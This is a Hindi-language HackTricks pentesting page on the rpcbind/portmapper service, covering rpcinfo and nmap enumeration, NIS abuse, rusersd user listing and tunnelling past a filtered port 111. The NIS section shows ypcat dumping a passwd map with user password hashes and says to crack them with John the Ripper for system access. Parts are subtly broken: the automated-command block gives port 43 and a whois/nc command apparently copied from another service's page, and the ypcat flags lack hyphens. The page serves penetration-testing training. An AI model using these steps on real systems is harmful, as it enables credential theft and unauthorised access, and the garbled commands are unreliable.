hacktricks/network-services-pentesting/pentesting-rpcbind.md

11 KiB
Raw Blame History

111/TCP/UDP - पेंटेस्टिंग पोर्टमैपर

AWS हैकिंग सीखें शून्य से लेकर हीरो तक htARTE (HackTricks AWS रेड टीम एक्सपर्ट) के साथ!

HackTricks का समर्थन करने के अन्य तरीके:

मूल जानकारी

Unix आधारित सिस्टम्स के बीच जानकारी प्रदान करता है। पोर्ट अक्सर जांचा जाता है, इसका उपयोग Nix OS की पहचान करने और उपलब्ध सेवाओं के बारे में जानकारी प्राप्त करने के लिए किया जा सकता है। पोर्ट NFS, NIS, या किसी भी rpc-आधारित सेवा के साथ उपयोग किया जाता है।

डिफ़ॉल्ट पोर्ट: 111/TCP/UDP, Oracle Solaris में 32771

PORT    STATE SERVICE
111/tcp open  rpcbind

एन्यूमरेशन

rpcinfo irked.htb
nmap -sSUC -p111 192.168.10.1

कभी-कभी यह आपको कोई जानकारी नहीं देता है, अन्य अवसरों पर आपको ऐसा कुछ मिल सकता है:

शोडन

  • port:111 portmap

RPCBind + NFS

यदि आपको NFS सेवा मिलती है, तो संभवतः आप सूची बना सकते हैं और फाइलें डाउनलोड (और शायद अपलोड) कर सकते हैं:

NFS प्रोटोकॉल का परीक्षण कैसे करें, इसके बारे में जानने के लिए 2049 - NFS सेवा का पेंटेस्टिंग पढ़ें।

NIS

यदि आपको ypbind सेवा चलती हुई मिलती है:

आप इसका शोषण करने का प्रयास कर सकते हैं। वैसे, सबसे पहले आपको मशीन का NIS "डोमेन नाम" अनुमान लगाना होगा (जब NIS स्थापित किया जाता है तो एक "डोमेन नाम" कॉन्फ़िगर किया जाता है) और इस डोमेन नाम को जाने बिना आप कुछ भी नहीं कर सकते

पर्यावरण के लिए NIS डोमेन नाम प्राप्त करने पर (इस मामले में example.org), NIS सर्वर को पिंग करने के लिए ypwhich कमांड का उपयोग करें और संवेदनशील सामग्री प्राप्त करने के लिए ypcat का उपयोग करें। आपको जॉन द रिपर में एन्क्रिप्टेड पासवर्ड हैशेस को फीड करना चाहिए, और एक बार क्रैक हो जाने पर, आप इसका उपयोग सिस्टम एक्सेस और विशेषाधिकारों का मूल्यांकन करने के लिए कर सकते हैं।

root@kali:~# apt-get install nis
root@kali:~# ypwhich -d example.org 192.168.10.1
potatohead.example.org
root@kali:~# ypcat d example.org h 192.168.10.1 passwd.byname
tiff:noR7Bk6FdgcZg:218:101::/export/home/tiff:/bin/bash
katykat:d.K5tGUWCJfQM:2099:102::/export/home/katykat:/bin/bash
james:i0na7pfgtxi42:332:100::/export/home/james:/bin/tcsh
florent:nUNzkxYF0Hbmk:199:100::/export/home/florent:/bin/csh
dave:pzg1026SzQlwc:182:100::/export/home/dave:/bin/bash
yumi:ZEadZ3ZaW4v9.:1377:160::/export/home/yumi:/bin/bash
मास्टर फाइल मैप(s) नोट्स
/etc/hosts hosts.byname, hosts.byaddr होस्टनेम और IP विवरण शामिल हैं
/etc/passwd passwd.byname, passwd.byuid NIS उपयोगकर्ता पासवर्ड फाइल
/etc/group group.byname, group.bygid NIS समूह फाइल
/usr/lib/aliases mail.aliases मेल उपनामों का विवरण

RPC उपयोगकर्ता

यदि आपको rusersd सेवा इस प्रकार सूचीबद्ध मिलती है:

आप बॉक्स के उपयोगकर्ताओं का अनुक्रमण कर सकते हैं। कैसे सीखने के लिए 1026 - Pentesting Rsusersd पढ़ें।

फ़िल्टर किए गए Portmapper पोर्ट को बायपास करें

यदि आपको nmap स्कैन के दौरान NFS जैसे खुले पोर्ट दिखाई देते हैं लेकिन पोर्ट 111 फ़िल्टर किया गया है, तो आप उन पोर्टों का शोषण नहीं कर पाएंगे।
लेकिन, यदि आप स्थानीय रूप से एक portmapper सेवा का अनुकरण कर सकते हैं और आप NFS पोर्ट को अपनी मशीन से पीड़ित वाले तक टनल कर सकते हैं, तो आप उन सेवाओं का शोषण करने के लिए नियमित उपकरणों का उपयोग कर पाएंगे।
अधिक जानकारी के लिए https://medium.com/@sebnemK/how-to-bypass-filtered-portmapper-port-111-27cee52416bc

Shodan

  • Portmap

अभ्यास के लिए लैब्स

HackTricks स्वचालित आदेश

Protocol_Name: Portmapper    #Protocol Abbreviation if there is one.
Port_Number:  43     #Comma separated if there is more than one.
Protocol_Description: PM or RPCBind        #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for PortMapper
Note: |
Provides information between Unix based systems. Port is often probed, it can be used to fingerprint the Nix OS, and to obtain information about available services. Port used with NFS, NIS, or any rpc-based service.

https://book.hacktricks.xyz/pentesting/pentesting-rpcbind

Entry_2:
Name: rpc info
Description: May give netstat-type info
Command: whois -h {IP} -p 43 {Domain_Name} && echo {Domain_Name} | nc -vn {IP} 43

Entry_3:
Name: nmap
Description: May give netstat-type info
Command: nmap -sSUC -p 111 {IP}
AWS हैकिंग सीखें शून्य से लेकर हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके: